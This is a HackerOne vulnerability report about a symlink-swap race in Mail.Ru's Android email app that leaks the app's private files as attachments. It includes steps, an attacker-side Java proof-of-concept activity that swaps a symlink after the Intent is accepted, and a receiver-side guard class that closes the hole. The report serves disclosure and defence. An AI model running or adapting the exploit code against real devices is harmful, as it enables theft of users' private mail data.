Mail.ru: Android MailRu Email: Thirdparty can access private data files with small user interaction

2017-05-04T20:35:14
ID H1:226191
Type hackerone
Reporter dzmitry
Modified 2018-01-02T18:01:25

Description

Hello, Team

Domain, site, application

Android Mail.Ru Email v. 5.5.1.21258

Testing environment

Tested on a non-rooted Nexus 5X, Android 7.1.2.

Intro

I found that #90693 was fixed incompletely and additionally the attack can be improved using the self-sending activity.

Steps

  1. Create a world-readable file at "/data/data/thirdparty/file.txt".
  2. Create a soft link to that file at "/data/data/thirdparty/link.txt".
  3. Send this soft link via Intent.EXTRA_STREAM to Mail.Ru's "ru.mail.ui.writemail.MailToMySelfActivity".
  4. After some delay, for example 1000 ms, remove the soft link and create a new one pointing at any file under "/data/data/ru.mail.mailapp/*". Note that MailToMySelfActivity sends automatically, so for your PoC you need to find a delay that fits the timing window. (Alternatively, ru.mail.ui.writemail.SharingActivity can be used.)
  5. The message will be sent. If the user opens that message, the attachment is downloaded automatically into the "/sdcard/Android/data/ru.mail.mailapp/...." folder.
  6. This means any app can read the attachment data, which may contain private file content, for example the message database.
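
The procedure above is a time-of-check/time-of-use race on a symlink: the mail app validates and accepts a harmless file, then reads the attachment through the same path after the link has been repointed into its own sandbox. The following attacker-side activity is an added illustration of steps 1 to 4 and is not the reporter's PoC source nor Mail.Ru code. It assumes the package name ru.mail.mailapp (taken from the paths in the report), a PoC app that either targets API 23 or relaxes StrictMode so that a file:// URI may be placed in an Intent on Android 7, and a victim path that the report does not name (the TARGET placeholder must be replaced with a real file on the test device).

```java
import android.app.Activity;
import android.content.ComponentName;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.os.Handler;
import android.os.StrictMode;
import android.system.ErrnoException;
import android.system.Os;

import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.nio.charset.StandardCharsets;

/**
 * Attacker-side app (the "thirdparty" of the report). Installs as an ordinary
 * unprivileged package; no root is required.
 */
public class SymlinkSwapPocActivity extends Activity {

    // Component named in the report; the package name is taken from the
    // /data/data/ru.mail.mailapp/ paths in the report.
    private static final String MAIL_PKG = "ru.mail.mailapp";
    private static final String MAIL_TO_SELF = "ru.mail.ui.writemail.MailToMySelfActivity";

    // Step 4 delay. The report used about 1000 ms and notes it has to be tuned
    // so the swap lands after the activity accepts the URI and before it
    // reads the attachment.
    private static final long SWAP_DELAY_MS = 1000;

    // ASSUMPTION: the report names no specific victim file, only "any file
    // from /data/data/ru.mail.mailapp/*". Replace this placeholder with a real
    // path on the test device; it is not a file name from the report.
    private static final String TARGET = "/data/data/ru.mail.mailapp/PRIVATE_FILE";

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        // Android 7+ throws FileUriExposedException for file:// URIs in an Intent
        // when targetSdkVersion >= 24. Either target API 23 or, as here, reset
        // the VM policy so the PoC can still hand over a file:// URI.
        StrictMode.setVmPolicy(new StrictMode.VmPolicy.Builder().build());

        File dir = getFilesDir();                 // /data/data/<thirdparty>/files
        File decoy = new File(dir, "file.txt");
        File link = new File(dir, "link.txt");
        try {
            // Step 1: a harmless world-readable file. The mail app runs under its
            // own UID, so the directory chain has to be traversable as well.
            try (FileOutputStream out = new FileOutputStream(decoy)) {
                out.write("harmless attachment\n".getBytes(StandardCharsets.UTF_8));
            }
            Os.chmod(getApplicationInfo().dataDir, 0755);
            Os.chmod(dir.getAbsolutePath(), 0755);
            Os.chmod(decoy.getAbsolutePath(), 0644);

            // Step 2: link.txt -> file.txt
            if (link.exists()) Os.remove(link.getAbsolutePath());
            Os.symlink(decoy.getAbsolutePath(), link.getAbsolutePath());

            // Step 3: attach the link, not the file. MailToMySelfActivity needs
            // no recipient and sends on its own.
            Intent send = new Intent(Intent.ACTION_SEND)
                    .setType("text/plain")
                    .setComponent(new ComponentName(MAIL_PKG, MAIL_TO_SELF))
                    .putExtra(Intent.EXTRA_STREAM, Uri.fromFile(link));
            startActivity(send);

            // Step 4: repoint the link while the mail app is between checking the
            // URI and reading it.
            new Handler().postDelayed(() -> swapLink(link), SWAP_DELAY_MS);
        } catch (ErrnoException | IOException e) {
            throw new IllegalStateException("PoC setup failed", e);
        }
    }

    /** Replace link.txt so that it now points at the mail app's private file. */
    private static void swapLink(File link) {
        try {
            Os.remove(link.getAbsolutePath());
            Os.symlink(TARGET, link.getAbsolutePath());
        } catch (ErrnoException e) {
            throw new IllegalStateException("link swap failed", e);
        }
    }
}
```

Steps 5 and 6 are then verified by opening the delivered message in the mail app and listing the download folder under /sdcard/Android/data/ru.mail.mailapp/ from `adb shell`; the attachment there should be the private file, not the decoy. If it is still the decoy, SWAP_DELAY_MS was too short or too long for the device and needs adjusting, as the report notes.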

PoC

I attach the PoC source. Video link (accessible only by URL): https://youtu.be/tXAadbkhDCM
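
The report does not say how the mail app validated the attachment URI, only that the earlier fix (#90693) left the race open. The guard below is an added example of how a receiving app can close this class of bug; it is not Mail.Ru's code. Its design rule is that every decision is made on the descriptor that was actually opened (fstat and /proc/self/fd), so a symlink swapped after a path check cannot help the attacker. It assumes the standard android.system.Os and ParcelFileDescriptor APIs available since API 21.

```java
import android.content.Context;
import android.net.Uri;
import android.os.ParcelFileDescriptor;
import android.os.Process;
import android.system.ErrnoException;
import android.system.Os;
import android.system.OsConstants;
import android.system.StructStat;

import java.io.File;
import java.io.IOException;
import java.io.InputStream;

/**
 * Receiver-side guard for attachments arriving via Intent.EXTRA_STREAM.
 * The path in the URI is treated as untrusted input; what is inspected is the
 * open file, not the path.
 */
public final class AttachmentGuard {

    private AttachmentGuard() {}

    public static InputStream openForAttachment(Context ctx, Uri uri) throws IOException {
        String scheme = uri.getScheme();
        if ("content".equals(scheme)) {
            // content:// goes through the provider's own permission model; the
            // receiver's private files are not reachable that way.
            InputStream in = ctx.getContentResolver().openInputStream(uri);
            if (in == null) throw new IOException("provider returned no stream");
            return in;
        }
        if (!"file".equals(scheme) || uri.getPath() == null) {
            throw new IOException("unsupported attachment URI scheme: " + scheme);
        }

        ParcelFileDescriptor pfd = ParcelFileDescriptor.open(
                new File(uri.getPath()), ParcelFileDescriptor.MODE_READ_ONLY);
        try {
            StructStat st = Os.fstat(pfd.getFileDescriptor());
            // 1. Regular files only: no directories, devices or FIFOs.
            if (!OsConstants.S_ISREG(st.st_mode)) {
                throw new IOException("attachment is not a regular file");
            }
            // 2. Anything owned by our own UID is private data of this app; a
            //    third-party sender has no legitimate reason to attach it.
            if (st.st_uid == Process.myUid()) {
                throw new IOException("attachment resolves to a file owned by this app");
            }
            // 3. Where does the open descriptor really point? The kernel resolves
            //    /proc/self/fd/N from the open file, not from the path we were
            //    handed, so a link swapped after open() is irrelevant here.
            String real = Os.readlink("/proc/self/fd/" + pfd.getFd());
            String ownData = new File(ctx.getApplicationInfo().dataDir).getCanonicalPath();
            if (real.equals(ownData) || real.startsWith(ownData + "/")) {
                throw new IOException("attachment resolves into " + ownData);
            }
            ParcelFileDescriptor accepted = pfd;
            pfd = null;                         // ownership moves to the returned stream
            return new ParcelFileDescriptor.AutoCloseInputStream(accepted);
        } catch (ErrnoException e) {
            throw new IOException("cannot inspect attachment descriptor", e);
        } finally {
            if (pfd != null) pfd.close();
        }
    }
}
```

The stream returned here must be the one the app copies the attachment from, in a single pass; re-opening the original path later (for example when the message is actually sent) would reintroduce the window the report exploits. Checking the canonical path before open() instead of after it is the pattern that stays vulnerable to the link swap.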